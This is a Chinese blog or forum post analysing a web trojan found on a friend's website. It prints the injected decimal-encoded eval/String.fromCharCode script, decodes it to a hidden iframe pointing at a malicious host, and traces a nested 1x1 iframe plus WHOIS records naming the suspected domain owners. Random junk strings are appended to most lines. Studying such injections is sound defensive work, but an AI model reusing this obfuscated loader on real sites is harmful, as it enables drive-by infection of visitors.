[原创]一篇刚写的分析木马手记

首发在我的博客里面， H6E@C}cyM  
9qD/q?Hh$  
http://www.areway.cn/?p=175 GjZ@fnF  
{:m5<6?x)  
q88p~Ccoa  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： S+>&O3m  
          FQNhn+A  
<script>t=’60,105,102,114,97,109,101, IIeEe7%#  
32,115,114,99,61,104,116,116,112,58,47,47, k$:QpTg[  
102,114,101,101,46,117,45,117,117,117,46,99, zk5sAHQ  
110,47,101,114,114,111,114,46,104,116,109, w8:F^{  
32,119,105,100,116,104,61,49,48,48,32,104, h9
5C4jBE  
101,105,103,104,116,61,48,62,60,47,105,102, lz\{ X  
114,97,109,101,62′; ONJW*!(  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> &RRggPx"k  
                                                                                                  'KpCPOhfR  
<script>t=’60,105,102,114,97,109,101,32,115,  z:9  
114,99,61,104,116,116,112,58,47,47,102,114, Tj*o[2mD  
101,101,46,117,45,117,117,117,46,99,110,47, 6CO>Tg:%  
101,114,114,111,114,46,104,116,109,32,119, /b6Y~YbgU  
105,100,116,104,61,49,48,48,32,104,101,105, //@_`.  
103,104,116,61,48,62,60,47,105,102,114,97, -aG( Yx  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); rMxst  
document.write(t);</script> ;hF>iw  
                                                                                                  qM3^)U2  
<html xmlns=” F`8A!|cIy  
http://www.w3.org/1999/xhtml mkYM/*qyM&  
“> 7}Z.g9<  
<head> OH5 kT$  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> oV?tp4&  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> pW8pp?  
<title>首页 - 爱生活家庭网 1w+OnJI?  
                                                                                                                                                    rsBF\(3b~  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 ^*C6]*C}te  
转换字符串后的大概内容是（谁点击后果自付）： FU!U{qDI  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… tnqW!F~  
                                                                                                                                  g-mK(kY4p  
查询玉米u-uuu.cn的详细信息： R8EDJ2u#  
Domain Name: u-uuu.cn l1jS2O(  
ROID: 20070901s10001s64972306-cn #:T5_9p  
Domain Status: ok =N<Hc:<t4  
Registrant Organization: 王雷 )ty *_@N0  
Registrant Name: 王雷 `h$6MFC/g  
Administrative Email: czlovexs@126.com gtJ^8khME  
Sponsoring Registrar: 北京万网志成科技有限公司 @l"GfDfL9  
Name Server:ns.yovole.com yN{Ybp  
Name Server:ns1.yovole.com %'\D_W&  
Registration Date: 2007-09-01 17:54 aEXV^5;,pJ  
Expiration Date: 2008-09-01 17:54 mwbkXy;8  
最后PING了一下地址 都没有什么…. 'BAe>r_Pn  
                                                                                                }y|%wym  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. SZG8@ !_}7  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> ?jw)%{iKYV  
<script language=”javascript” src=” TW3
:Y\p  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script 'P@
a_*I  
> rorzxp{  
这个玉米应该有可能是木马作者的： =Z#tZ{"  
foafau.info的详细信息： ddnWr"_  
Access to INFO WHOIS information is provided to assist persons in 2_r}4)z  
determining the contents of a domain name registration record in the q>Px  
Afilias registry database. The data in this record is provided by e-qr d  
Afilias Limited for informational purposes only, and Afilias does not rUlpo|B  
guarantee its accuracy.  This service is intended only for query-based fbw{)SZ  
access. You agree that you will use this data only for lawful purposes Z|8f7@k{|+  
and that, under no circumstances will you use this data to: (a) allow, /unOZVr(
 
enable, or otherwise support the transmission by e-mail, telephone, or (Egykh>  
facsimile of mass unsolicited, commercial advertising or solicitations 9%zR?u  
to entities other than the data recipient’s own existing customers; or apY m,_  
(b) enable high volume, automated, electronic processes that send WK;p[u?~xi  
queries or data to the systems of Registry Operator, a Registrar, or M?nnpO  
Afilias except as reasonably necessary to register domain names or "a,Tc2xk  
modify existing registrations. All rights reserved. Afilias reserves c |C12b[  
the right to modify these terms at any time. By submitting this query, 2"__jp:(  
you agree to abide by this policy. =PZs'K  
Domain ID:D22418703-LRMS /E]4N=T  
Domain Name:FOAFAU.INFO X/7: *  
Created On:20-Nov-2007 16:05:42 UTC zZiB`%  
Last Updated On:20-Nov-2007 16:05:44 UTC N_gjOE`x5  
Expiration Date:20-Nov-2008 16:05:42 UTC -3 W4  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) IZ2#jSDn  
Status:CLIENT DELETE PROHIBITED Zfb:>J@h6  
Status:CLIENT RENEW PROHIBITED "{V,(w8Dt  
Status:CLIENT TRANSFER PROHIBITED DJn>. Gd  
Status:CLIENT UPDATE PROHIBITED e#zGLxa  
Status:TRANSFER PROHIBITED aD&10b9`  
Registrant ID:GODA-040110615 Oi7=z?+j  
Registrant Name:liu hong )bK<t  
Registrant Organization: fmSw%r|pT  
Registrant Street1:beijing OOk53~2id  
Registrant Street2: +=}% 7o  
Registrant Street3: U{O\  
Registrant City:beijing kb%W3c9HO  
Registrant State/Province: S[u<vHy  
Registrant Postal Code:100000 RK'( {1  
Registrant Country:CN Me`"@{r|#  
Registrant Phone:+86.860108888777 C*
gSx3OG  
Registrant Phone Ext.: 71)#'ey  
Registrant FAX: d3{Zhn@  
Registrant FAX Ext.: ,LMme}FFeb  
Registrant Email:bbbshiji@163.com /kJ*WA?J  
Admin ID:GODA-240110615 ?%LD1
<ya  
Admin Name:liu hong aIfog+Lp  
Admin Organization: Hou{tUm{xC  
Admin Street1:beijing =Q|}7g8o  
Admin Street2: Maxnk3n  
Admin Street3: i#-Jl7V[a  
Admin City:beijing w{r->Phe  
Admin State/Province: 1L9^N  
Admin Postal Code:100000 7}lZa~/  
Admin Country:CN BF_k~  
Admin Phone:+86.860108888777 {jc~s~<#  
Admin Phone Ext.: &FZe LIt  
Admin FAX: T.|0;Eb  
Admin FAX Ext.: rxz3Mqg  
Admin Email:bbbshiji@163.com 43)9iDmJ8<  
Billing ID:GODA-340110615 NrU-%!Aw  
Billing Name:liu hong sEj:%`l|  
Billing Organization: lZua"Ju  
Billing Street1:beijing
EjF}yuq[  
Billing Street2: XWvs~Xw@  
Billing Street3: KW;xlJz(j  
Billing City:beijing M\<!m^~  
Billing State/Province: UMX+h])#N  
Billing Postal Code:100000 '~f@p~P  
Billing Country:CN o|}%pc3  
Billing Phone:+86.860108888777 y$&a(S]  
Billing Phone Ext.: dyp]y$  
Billing FAX: ,-1$Vh@wM  
Billing FAX Ext.: E:o:)h?$  
Billing Email:bbbshiji@163.com (o:CxhV  
Tech ID:GODA-140110615 "p;DQ-V  
Tech Name:liu hong BJq}1mn*  
Tech Organization: mQvKreo~  
Tech Street1:beijing nn   
Tech Street2: 2(rZ@Wl  
Tech Street3: %zD-gw>  
Tech City:beijing $oQsh|sTI  
Tech State/Province: 6P~"7k  
Tech Postal Code:100000 (g)@wNBW  
Tech Country:CN e-')SB  
Tech Phone:+86.860108888777 'H'+6 
 
Tech Phone Ext.: h@~X*yLKh  
Tech FAX: iR_Syk`G*A  
Tech FAX Ext.:
Y-Ku2m  
Tech Email:bbbshiji@163.com B5cyX*!?  
Name Server:NS27.DOMAINCONTROL.COM '; dW'Uwc  
Name Server:NS28.DOMAINCONTROL.COM E5t+;vL~  
Name Server: 1;xw)65  
Name Server: =5/;h+bk+3  
Name Server: PHK#b.B>a8  
Name Server: 0;H6b=  
Name Server: t?
A4xk  
Name Server: oe*&w9Y}&  
Name Server: yki k4MeB  
Name Server: ^sOm7S{  
Name Server: Fp6Y Y  
Name Server: {l11WiqQH  
Name Server: =zjUd 5  
                                                                                                          M$W#Q\<*#r  
接着下载每个文件里面的代码： w.Vynb  
一步一步看.. L@_">'pR  
&+j
^{a  
(rG1_lUDu  
XH *tChf<  
 b:QFD|  
%1@<),  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。